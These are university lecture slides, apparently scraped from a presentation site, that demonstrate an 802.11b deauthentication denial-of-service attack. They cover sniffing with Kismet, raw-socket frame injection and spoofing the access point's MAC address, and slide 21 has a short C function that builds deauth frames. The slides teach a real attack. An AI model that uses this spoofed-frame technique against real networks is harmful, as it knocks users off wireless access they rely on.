1 / 24

802.11 Attack Demo

802.11 Attack Demo. Haobo Zhou (hzhou@liacs.nl) L I A C S http://www.liacs.nl/home/hzhou. What Will Be Covered. Overview of 802.11b Wireless network sniffer Frame Injection Deauth/Disassociation Attack Attack Demo. NO!! Thanks. OK !!. Dinner??. ISO OSI Model and 802.11b.

didier
Download Presentation

802.11 Attack Demo

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. 802.11 Attack Demo Haobo Zhou (hzhou@liacs.nl) L I A C S http://www.liacs.nl/home/hzhou

  2. What Will Be Covered • Overview of 802.11b • Wireless network sniffer • Frame Injection • Deauth/Disassociation Attack • Attack Demo

  3. NO!! Thanks OK !! Dinner??

  4. ISO OSI Model and 802.11b Overview of 802.11b Obtained From http://alpha.fdu.edu/~kanoksri/IEEE80211b.html

  5. Overview of 802.11b • Runs over 2.4ghz • DSSS - Direct Sequence Spread Spectrum • Channels • FCC (US) - 11 Channels (1-11) • ETSI (EU) - 13 Channels (1-13) • France - 4 Channels (10-13) • Japan - 14 Channels (1-14) • Uses CSMA/CA

  6. Overview of 802.11b • Uses WEP for Encryption • “Wired Equivalent Privacy” • Uses RC4 • 40-bit or 104-bit static key with 24-bit IV

  7. Overview of 802.11b • Consists of 3 main protocol types • Management • Control • Data

  8. Overview of 802.11b AD Hoc

  9. Overview of 802.11b Infrastructure

  10. Beacon Authentication Req Authentication Resp Association Req Association Resp Overview of 802.11b Node Access Point Access Point Accepts Node Node is Associated

  11. Wireless network sniffer wireless networking Detection • NIC with monitor mode support • why? • Management frame • Frames belongs to others • Tools • Kismet • others

  12. Wireless network sniffer Networking Interface Card Mode • Managed (Infrastructure) • Ad-Hoc (AD Hoc ) • Monitor ( Hardware support ??) • Master (acts as an AP)

  13. Wireless network sniffer • KISMET • An 802.11 layer2 wireless network sniffer • Working on Linux • Ethereal/Tcpdump compatable data logging • Over 20 supported card types • Open source code

  14. Kismet

  15. Frame Injection • NIC • support ? • Device Driver • support frame injection? • Yes- very good • NO- Change it! • User program

  16. Frame Injection • User program • C code in linux • RAW socket programming • Use PF_PACKET interface to access the link layer • sd=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

  17. Deauthentication Attack • Management frames can control link characteristics and physical medium properties • 802.11b management frames are NOT authenticated • Why is this bad?

  18. Deauthentication Attack • Denial of Service – De-authentication • Use MAC address of Access Point • Send deauthenticate frames • Send continuously • Users are unable to reassociate with AP

  19. Deauthentication Attack STATE 1 Unauthenticated Unassociated STATE 2 Authenticated Unassociated Successful authentication Deauthentication Disassociation Deauthentication Successful Association STATE 3 Authenticated Associated

  20. Attacker must spoof AP MAC address in Src Addr and BSSID • Sequence Control field handled by firmware (not set by attacker) Deauthentication Attack Deauth framestructure

  21. Deauthentication Attack • void send_deauth (__u8 *dst, __u8 *bssid) • { struct { • struct a3_80211 hdr; • __u16 reason; • }mgt_frame; • memset(&mgt_frame, 0, sizeof(frame)); • mgt_frame.hdr.mh_type = FC_TYPE_MGT; • mgt_frame.hdr.mh_subtype = MGT_DEAUTH; • memcpy(&(mgt_frame.hdr.mh_mac1), dst, 6); • memcpy(&(mgt_frame.hdr.mh_mac2), bssid, 6); • memcpy(&(mgt_frame.hdr.mh_mac3), bssid, 6); • mgt_frame.reason = 2; • send(socket, &frame, sizeof(mgt_frame), 0); • }

  22. Question ? deauth-attack demo continues

  23. Hardware Laptop Wireless card Atheros 5212 chip monitor mode support software Device Driver Madwifi open source project Two patches to enable frame injection User program Fata_jace.c Hardware Laptop Wireless card Software Ping Use ping to make sure the connection 802.11 Deauth-attack DEMO Attacker Victim

  24. Thanks • Xu Li • Wei Wang • Google

More Related